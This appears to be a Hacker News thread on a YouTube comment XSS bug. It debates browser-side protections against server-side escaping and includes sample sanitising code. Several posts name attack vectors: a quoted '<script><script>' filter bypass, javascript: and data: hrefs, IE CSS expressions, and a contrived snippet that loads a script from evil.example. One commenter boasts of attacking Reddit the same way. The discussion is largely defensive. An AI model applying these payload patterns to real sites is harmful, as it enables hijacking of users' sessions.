XSS is such a huge deal, and yet I don't understand why browser makers, the W3C, etc. haven't agreed on any solutions yet. Two ideas:
a. Have a meta tag (or something in the <head>) that says: do not allow inline script tags on this page, only run scripts from external .js files, and ignore any onclick/onmouseover code in the HTML.
b. Have a <noscript_within> tag that tells browsers to completely ignore all inline script (including onclick code) within it. That way sites could allow arbitrary HTML inside <noscript_within><div id="comments">...</div></noscript_within>. (A rough sketch of both ideas follows.)
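Neither of these exists, so the markup below is purely hypothetical; the meta tag name in particular is made up, but it shows the behavior I have in mind:

    <!-- (a): hypothetical opt-in flag; the name "X-No-Inline-Script" is invented -->
    <head>
      <meta http-equiv="X-No-Inline-Script" content="true">
      <script src="/static/site.js"></script>        <!-- still allowed -->
    </head>
    <body>
      <script>alert('xss')</script>                  <!-- ignored by the browser -->
      <a href="#" onclick="alert('xss')">x</a>       <!-- onclick ignored too -->

      <!-- (b): hypothetical wrapper; everything inside is treated as inert markup -->
      <noscript_within>
        <div id="comments">user-supplied HTML goes here</div>
      </noscript_within>
    </body>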
NoScript sounds like a better and better option these days. I already use FlashBlock to protect against 0-day Flash vulnerabilities.
a. That would barely mitigate the problem. It might stop some of the goofy alert() hacks from people messing around, but the others would just use the exploit to include an external .js file. Even if your meta tag required all JS code to be in the <head>, someone could have used this exploit to create an iFrame which then contained the JS, or to create a meta-refresh tag that redirects to a page with the exploit. The possibilities are endless.
b. If someone figures out how to break the character escape jail, then they're going to be able to write a </noscript_within> tag.
If a user can do an alert(), they can pretty much do anything. JS has no security levels except domain restrictions.
> someone could have used this exploit to create an iFrame
But this exploit wouldn't even run. My browser would only run JS on youtube.com from external .js files. YouTube devs could put <script> within their PHP pages and it would do nothing, let alone random users putting <script> tags in comments. The only way to run ANY JS on youtube.com would be to load an external .js file, and if this meta tag were present, you couldn't load an external .js file unless it was referenced in the <head>. I really fail to see a way to break out of this shell. Adding a <script>, <meta>, <link>, or <head> tag below the initial <head></head> would not work when this mode was turned on. Well-designed sites don't add meta/link tags outside of the <head> anyway, so I don't think it is asking for too much.
> If someone figures out how to break the character escape jail
I agree, but that is almost certainly preventable. Right now JS can be introduced in so many ways (<script> tags, on-event attributes, javascript: URLs) and web devs have to protect against all of them. I remember that in one of the MySpace XSS attacks, IE allowed "<scri\npt>" to execute despite the newline. Browsers would look for the literal string <noscript_within> as the start and </noscript_within> as the end, and so would web devs. No partial lines, no attributes, no nothing. The regex doesn't fail.
The point I'm making is that it's not as easy a problem to solve as you're claiming. The problem is that, as you said, there are so many different XSS vectors in the browser; if you patch one specific use case, the exploiter will just find another. Browser developers aren't avoiding this problem; they just realize how complicated it is and have to approach it slowly to do it right, without breaking compatibility.
Your <noscript_within> tag is something that I'm sure every browser developer (and web app developer) has thought up at some point. It does not resolve this problem. It would only protect a site that passed all user input directly onto the page unedited. Your solution would require app developers to allow commenters the full range of HTML (including blink, marquee, and who knows what else) in their comments, because once the app developer starts trying to filter the commenter's input, he's opening himself up to an exploit that allows the filtered output to contain a </noscript_within> tag.
The simplest example would be an app developer who simply deleted all <marquee> tags because he/she wanted to disallow marquees. The script kiddie would just insert </noscript_<marquee>within> into his comment.
The more complicated examples would be things that neither you nor I have thought of yet.
That doesn't even take into account users of legacy web apps who could start posting unclosed <noscript_within> tags (in apps which allow HTML but filter only certain tags) to disable legitimate JS later in the page, breaking those apps. Of course, it would be possible to enable <noscript_within> only for a certain doctype or something, but then it's certain that some web developers will forget to do so and leave their app open to abuse.
You are oversimplifying the problem. I am sure that a solution exists and XSS will eventually become a problem of the past, but the solution will be more complicated than you claim it would be.
Forget (b); I get that it may not be perfect. Why do you think (a) wouldn't work? It is as simple as disabling JS in HTML pages, which already works in every browser, plus still allowing JS from .js files. I understand it is more complex than I'm making it out to be, but isn't that better than XSS bugs on the world's largest sites?
The implementation of (a) would be extremely complex from both the web developer's and the browser developer's viewpoint.
From the web developer's perspective: it's very hard to use JS without putting at least some JavaScript in the HTML. Loading .js files is not very useful if there's no means to actually activate any of the functionality in those files.
In order for your idea to work, you'd have to completely strip the HTML of anything that can reference or activate JavaScript: not just onmouseover, but href="javascript:xxxx()" as well. That means the only way you could actually use JavaScript on a page would be to create a function, run from the body's onload, that adds event listeners and other attributes through DOM manipulation. It would make web development so convoluted that I doubt you'd succeed in convincing the W3C or anyone else to adopt it.
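Even a simple confirm-before-delete link would have to move out of the markup and into script. A minimal sketch of what that looks like, assuming a made-up delete-links.js file and a 'delete-link' class name:

    // delete-links.js -- loaded via <script src="/js/delete-links.js"> in the <head>.
    // No onclick anywhere in the HTML; everything is wired up after the page loads.
    window.onload = function () {
      var links = document.getElementsByClassName('delete-link');
      for (var i = 0; i < links.length; i++) {
        links[i].addEventListener('click', function (e) {
          if (!confirm('Really delete this item?')) {
            e.preventDefault();  // cancel the navigation if the user says no
          }
        }, false);
      }
    };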
I think the right approach has to maintain the workflow and functionality of web development. tptacek posted an idea in the other thread that sounds like it would reduce the number of attack vectors without causing too much difficulty for the developer: include a nonce in the header and require script tags to include that nonce.
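As I understood that suggestion, it would look roughly like this; the header name, attribute name, and function are all invented for illustration, and nothing like this exists in browsers today:

    HTTP response header (random value generated for every response):
        X-Script-Nonce: 7f3a91c2

    In the page:
        <script nonce="7f3a91c2">initComments();</script>  <!-- runs: nonce matches -->
        <script>alert('xss')</script>                      <!-- injected, no nonce: ignored -->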
People have been focusing on the noscript tag, but I rather like the idea of something in the head that disables all javascript in the body. One good idea is perhaps better than one good idea followed by one bad idea, especially when the history is already full of so many horrible ideas that got into the spec. ;)
But there's also already something in HTML5: the iframe sandbox attribute. Among other things, it can be used to stop scripts from running inside an iframe. You can read about it here. Amusingly, they suggest it may be available for widespread use in 10 years. http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox
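The attribute itself is about as simple as it gets (the src path here is made up):

    <!-- an empty sandbox attribute blocks scripts, forms, plugins and more inside the
         frame; individual capabilities can be re-enabled with tokens such as allow-forms -->
    <iframe sandbox src="/comments-frame"></iframe>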
> One good idea is perhaps better than one good idea followed by one bad idea
Haha. I'm sure both ideas have been proposed by many people over the years. I have definitely heard of (b) from many others. I haven't heard of anyone else mentioning (a) yet. I'm kinda surprised that everyone keeps arguing against (b) while saying nothing about why (a) won't work.
I believe that I and others have raised objections that apply to (a) as well.
1. Take any given browser-based security check. A server that cares about security could do that check itself, as a last step, instead of waiting for a hypothetical browser to do it. Worried about scripting in the body? Strip script tags (or whatever) as your last step. Sure, you could do it wrong, but so could the browser. This wouldn't solve client-side security problems, but that is, and should be, the client's problem. Some of the clients hitting a large site are going to be compromised, and the site has to deal with that separately from its own potential use as a vector for infection.
2. Take away the sites that care about security and ... you're left with the sites that don't care about security. And even if you add the browser-side security, those uncaring sites would still be there and still be vulnerable.
Sure, this division might be a little simplistic, and you could cook up an argument for script signing, but it still doesn't make sense to me. Implementing security in a single reliable place, your site, seems inherently better than implementing it across multiple domains you don't control. Microsoft's signed applets were a failure back in the day, as I recall. Indeed, if you need something totally secure, why not use Java applets? They already have security implemented inherently. (Java applets were not perfectly secure, but at least security was in Java to begin with, so it will always be much stronger than JavaScript's ... though we have to think about why Java applets were so much less successful than Ajax applications.)
Probably the best method for this is specifying the number of characters inside the <noscript_within> tag. I don't believe this would break caching, as the length only changes when the content changes.
Until someone writes </noscript_within > or < /noscript_within> and your script doesn't catch it but the browser accepts it. Or one of hundreds of other small details that neither one of us has thought of yet.
That's why browser makers have to agree on the acceptable usage and spell out what web devs should search for and sanitize. Right now, browser makers do not recommend anything except "sanitize your input", and that means something completely different for each browser.
Yes, every single XSS vulnerability is pretty easy to fix on its own. The problem is that you'll never get all of them across browsers.
It's time that browser makers went back to the drawing board and came up with a base security model to cut the fat away from the basic attack footprint. Some drastic limit on the source of executable JS files, specified in an HTTP header, could be very effective.
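Purely as a sketch of what I mean, with the header name and syntax invented for illustration:

    HTTP/1.1 200 OK
    Content-Type: text/html
    X-Script-Source: self static.example.com

    (meaning: only external scripts loaded from this origin or static.example.com may
    execute; inline <script> blocks and on* attributes are ignored entirely)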
> It's time that browser makers went back to the drawing board and came up with a base security model to cut the fat away from the basic attack footprint. Some drastic limit on the source of executable JS files, specified in an HTTP header, could be very effective.
Absolutely! I'm just surprised that so many people here are against any changes to the browsers while expecting every single developer in the world to ensure there's not one bug in their code.
This isn't the same thing as PHP's safe_mode, which never really worked as expected. It's more like the crossdomain.xml file: something browser makers can proactively do to improve security. Sure, web developers should keep sanitizing inputs as much as possible, and browsers should try to prevent XSS as much as possible. Why can't both work together? Why is it only the developers' problem?
I don't think people are against changes to the browsers. I think they just realize that there are many different browsers out there that each do things slightly differently. If you've ever tried to get CSS working for all possible browsers, you've probably come across cases where it works in some browsers, but not others (I'm looking at you IE6), and you have to use a hack to get it to work.
Changes to browser standards occur at a much slower rate than changes to your code. Politics, competition, and disagreements on standards often get in the way. Just look at all the controversy over the HTML 5 video codec.
Unless browser makers, by some miracle, agree on a common standard for browser security, there are always going to be little idiosyncrasies that occur from browser version to browser version. Just because it's secure in all the browsers you tested doesn't mean that it's secure in the browsers you didn't test.
The best solution as of right now is to develop ways of writing more secure code, with less potential for human error.
It's not rocket science. Escaping HTML properly is a good start. Not just "oh yeah, we'd better disallow any <script> tags". I mean properly: escape every single character so that there is absolutely no possible way anything can be interpreted as anything but a literal character to be displayed.
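For the common case, the characters that matter boil down to a handful of replacements. A minimal sketch (a real site should lean on its framework's built-in escaper):

    // Minimal HTML escaping for text placed inside element content or a
    // double-quoted attribute value. The ampersand must be replaced first.
    function escapeHtml(text) {
      return String(text)
        .replace(/&/g, '&amp;')
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;')
        .replace(/"/g, '&quot;')
        .replace(/'/g, '&#39;');
    }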
<noscript_within> sounds like a good solution if you have no idea how to properly escape html.
If you want to be extra sure, just send the data as JSON and build it out in the DOM with createTextNode so you're sure it's actually text and nothing else.
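Roughly like this (the element id and the JSON shape are just for illustration):

    // Comments arrive as JSON, e.g. [{"author": "bob", "text": "<script>alert(1)</script>"}].
    function renderComments(comments) {
      var list = document.getElementById('comments');
      for (var i = 0; i < comments.length; i++) {
        var div = document.createElement('div');
        // createTextNode treats the string as literal text: the markup above is
        // displayed to the reader, never parsed or executed
        div.appendChild(document.createTextNode(
            comments[i].author + ': ' + comments[i].text));
        list.appendChild(div);
      }
    }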
From Reddit:
>> All you need is: <script><script>PAYLOAD
>> Any HTML after the second non-closed script tag survives unescaped.
>> YouTube escapes the first script tag and not the second.
This isn't "XSS attacks are inevitable and so hard to defend against". This is "WTF are you thinking youtube? Did you get a 12 year old to code your comment parsing code?"
I know. But it isn't a cakewalk either when you take Unicode/UTF encodings etc. into consideration. MySpace, Twitter, Facebook, and now YouTube have all been bitten by it, some multiple times. My point is, with so much social content being user-generated, there is absolutely no way to wall off the user content easily. You have to manually make sure every piece of user data is parsed and filtered, and most developers do that, but it's not easy.
Show me the code that allows users to enter basic HTML (<a>, <b>, <p>, <u>) while preventing the bad stuff (<script>, <body>). Now make this code allow <a> to have attributes like href and title but not onclick or onmouseout. Allow <p> to have a style attribute for font-family but not width:expression(400 + "px"), because that's another way to run JS in IE. You'll quickly see how difficult it gets.
The solution for most sites (including reddit/HN) is to use Markdown. It's not a perfect solution but it works for sites where data entry is restricted to a few fields. YouTube is so large and has so many places where users can enter arbitrary data that it is not simple to ensure there are no bugs anywhere.
Again, I don't understand how my solution (a) fails to prevent any of the XSS hacks we've seen so far. Each hack worked because users could insert JS code into a form that was not properly filtered. What is harder: making sure every single web form on the Internet has 0 sanitization bugs, or adding a single meta-tag to top browsers that says "Hey, don't run any inline JS"?
a) Escape everything in the input.
b) Look for <a> tags, grab their href attribute, escape it, and insert them as <a href='$1'>$2</a>.
c) Do the same for <b>, <p>, etc.
How would that be vulnerable to XSS? A small whitelist of HTML would be replaced safely, and any script tags and so on would be escaped and displayed as is.
In your example above, $1 may contain javascript. The easy way is href="data:text/javascript", or even href="javascript:alert('foo')", but there are probably a dozen other ways, including data:image/svg.
There's no real way to "escape" URL attributes (some browsers are known to run strings like 'any: ex' as javascript); parsing the URL seems to be the only approach that works.
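That is, whitelist the scheme after normalizing, rather than trying to escape the value. A rough sketch; the allowed-scheme list is just the obvious minimum, and the result still needs normal attribute escaping when written into the tag:

    // Parse out the scheme and whitelist it, instead of trying to escape
    // javascript:, data:, vbscript: and friends.
    function safeHref(url) {
      // strip whitespace/control characters first; some browsers treat
      // "java\tscript:..." the same as "javascript:..."
      var cleaned = String(url).replace(/[\x00-\x20]/g, '');
      var m = cleaned.match(/^([a-z][a-z0-9+.\-]*):/i);
      if (!m) return cleaned;                // no scheme at all: relative URL, fine
      var scheme = m[1].toLowerCase();
      if (scheme === 'http' || scheme === 'https' || scheme === 'mailto') {
        return cleaned;
      }
      return '#';                            // everything else gets neutered
    }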
>> "show me the code that allows users to enter basic HTML (<a>, <b>, <p>, <u>) while preventing the bad stuff (<script>, <body>)."
1. Disallow everything. Escape everything 100%.
2. Now selectively parse out the original and recreate what is explicitly allowed. Do not include anything from the input in the code portions of the output that hasn't been completely sanitized.
This isn't a hard problem. It's like asking, "Make a firewall that allows MySQL and SSH through, but nothing else." The thing is, people make mistakes, and developers are often lazy.
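A crude sketch of that two-step approach; the tag whitelist here is deliberately tiny, and a real implementation would use an actual HTML parser rather than regexes:

    // Step 1: escape everything, so nothing from the input is live markup.
    // Step 2: selectively re-create the few tags that are explicitly allowed.
    function renderComment(input) {
      var escaped = String(input)
        .replace(/&/g, '&amp;')
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;')
        .replace(/"/g, '&quot;');
      // bare <b>, <i>, <u>, <p> (and their closing tags) only; no attributes at all
      return escaped.replace(/&lt;(\/?)(b|i|u|p)&gt;/gi, '<$1$2>');
    }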
>> "Making sure every single web form on the Internet has 0 sanitization bugs or adding a single meta-tag to top browsers that says "Hey, don't run any inline JS."
Asking the browser to do your security for you seems pretty lazy. If you can't manage to escape HTML properly, what other security issues are there likely to be that the browser can't help with? SQL injections?
> selectively parse out the original and recreate what is explicitly allowed.
This is the ONLY solution. Trying to blacklist and escape characters is ultimately trying to push your parsing problem down to the browser, and what will you do when the browser contains a bug that someone can exploit to steal your own credentials on the web app?
I'm a strong believer in using JS to inject untrusted text into the DOM only as text nodes, never as markup. If you want people to mark stuff up, give them a markup language that you parse. Note that Markdown has its issues: if you use a library to parse it, be aware that HTML is valid Markdown, so you're just moving the HTML-escaping problem around.
If this kind of filtering were possible for a browser to do after receiving the input, it would be possible for the server to do to its output before sending that output to the browser.
If this signing were a solution, a given server could immediately solve its own problem by doing it, at the cost of some processing time.
And if a given server wasn't interested in solving the problem now, it might not implement the solution even if it were implemented in some portion of the browsers out there. Indeed, why would any server bother to implement a security protocol which didn't nail every exit? There would always be browsers which didn't follow the new signing protocol. YouTube could patch its problem immediately, or wait a decade or two for your solution to happen...
Not sure about <noscript_within> going all the way to the browser -- but it might be useful as a directive to a front-end reverse proxy, working a little like an edge-side include but telling the proxy to strip stray SCRIPTs. That would provide a last line of defense against injected scripts.
Not elegant, but by providing a separate, independent layer of enforcement it could prove worthwhile.
Still, there's the problem of getting app developers to rigorously declare the SCRIPT-suppressed regions. So perhaps the sense should be reversed: require app designers to rigorously declare only those narrow areas where SCRIPTs are allowed -- with everything else stripped out (and logged as anomalous) by the bastion proxy.
I've read your idea before, and while I have absolutely no technical issues with it, I think it requires a lot more work from everyone involved. The only use for inline scripts at the end of a webpage (right before the </body> tag) that I can think of is analytics/user-tracking scripts. Other than that, I don't see why the JS code couldn't live in a .js file. And since JS code in .js files can load the analytics scripts (albeit in a different order than inline script tags), I think my (a) approach would be sufficient for blocking XSS.
Your proposal only closes a few possible holes. This is worse than nothing, because it creates a false sense of security.
The reason is that JavaScript code trusts the DOM in many and varied ways, and can thereby be tricked into doing unexpected things by plain HTML code. Consider a page using a calendar.js plug-in, and a user-provided element '<div class="calendar" month="13">...</div>'. This could easily result in JavaScript code being configured with hostile parameters and event handlers being bound to hostile elements.
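A contrived sketch of that failure mode; the initializer, class name, and attribute below are all invented, but plenty of real widget libraries bootstrap themselves this way:

    // calendar.js-style initializer: it trusts whatever it finds in the DOM.
    // A user-supplied <div class="calendar" data-feed="//evil.example/cal.js">
    // gets picked up exactly like a legitimate one; no <script> tag required.
    function initCalendars() {
      var nodes = document.querySelectorAll('div.calendar');
      for (var i = 0; i < nodes.length; i++) {
        var feed = nodes[i].getAttribute('data-feed');  // attacker-controlled value
        var s = document.createElement('script');       // JSONP-style data loader
        s.src = feed;                                    // hostile script now executes
        document.body.appendChild(s);
      }
    }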
The only way to handle complex user-provided input is to start with a blank slate, parse the input completely, and only create output that is proven safe.
Google's official statement:
"We took swift action to fix a cross-site scripting (XSS) vulnerability on youtube.com that was discovered several hours ago. Comments were temporarily hidden by default within an hour, and we released a complete fix for the issue in about two hours. We’re continuing to study the vulnerability to help prevent similar issues in the future."
http://techie-buzz.com/online-security/youtube-hack-update.h...
To make things even worse, those bloody 4channers are already aware of it.
http://boards.4chan.org/b/res/247794166 (Warning: That page triggered several alerts for drive-by malware downloads (Kaspersky))
Don't waste your time linking directly to 4chan posts, especially on high-traffic boards like /b/. It only keeps a certain number of threads up at one time; ones that stop being replied to scroll off the end of the queue and get nuked.
One thing I find interesting about YouTube's response is that they are reportedly going in and removing <script> tags from already posted comments. So... does this mean they sanitize comments at post time, rather than at display time?
When I did this same shit to Reddit a year ago (during the time they were doing it to Sears whilst crying 'I'm being oppressed!'), they all called me an asshole.
Now it's because everyone at Google sucks, and this is some unforgivable sin on the content provider's behalf, not the jerk users who are exploiting it.